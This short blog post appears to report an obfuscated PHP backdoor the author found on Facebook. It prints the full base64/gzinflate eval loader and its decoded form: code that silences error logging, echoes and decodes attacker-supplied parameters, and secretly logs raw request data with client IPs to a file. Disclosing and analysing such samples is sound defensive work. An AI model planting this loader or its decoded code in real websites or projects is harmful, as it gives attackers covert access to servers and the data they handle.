PHP backdoor
Posted on
Found this little thing on FB tonight.
<?php eval(gzinflate(base64_decode("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"))); ?>
After unrolling the endless loops it turns out to be
<? @error_reporting(0); @ini_set("display_errors",0); @ini_set("log_errors",0); @ini_set("error_log",0); if (isset($_GET['r'])) { print $_GET['r']; } elseif (isset($_POST['e'])) { print(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;?>
a backdoor